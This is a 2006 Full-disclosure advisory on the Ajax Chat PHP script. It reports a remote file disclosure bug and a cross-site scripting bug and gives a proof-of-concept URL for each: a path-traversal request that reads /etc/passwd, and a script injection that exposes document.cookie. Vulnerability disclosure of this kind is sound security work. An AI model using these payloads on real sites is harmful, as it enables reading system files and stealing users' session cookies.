Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [Full-disclosure] Content Management Framework "G3" - XSS Vulnerability in Search Function [Full-disclosure] X-Statics 1.20 SQL Injection Vulnerability [Full-disclosure] X-Protection 1.10 SQL Injection Vulnerability [Full-disclosure] X-Poll SQL Injection Vulnerability From:Eduardo Vela <sirdarckcat_(at)_gmail.com> Date:02.08.2006Subject:[Full-disclosure] Ajax Chat Multiple VulnerabilitiesDiscovered by Sirdarckcat from elhacker.net Ajax Chat http://www.pcdiscs.co.uk/chat/ ============================================== Ajax Chat is a web script for making an online chat based on PHP and AJAX. This has a Remote File Disclosure and a XSS bug. ============================================== RFD PoC: http://www.server.com/includes/operator_chattranscript.php?chatid=../../../../../ ../etc/passwd%00 ============================================== XSS PoC: http://www.server.com/visitor/livesupport/chat.php?userid=<script>alert( document.cookie)</script> ============================================== Att. Sirdarckcat elhacker.net
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[Full-disclosure] Content Management Framework "G3" - XSS Vulnerability in Search Function
[Full-disclosure] X-Statics 1.20 SQL Injection Vulnerability
[Full-disclosure] X-Protection 1.10 SQL Injection Vulnerability
[Full-disclosure] X-Poll SQL Injection Vulnerability
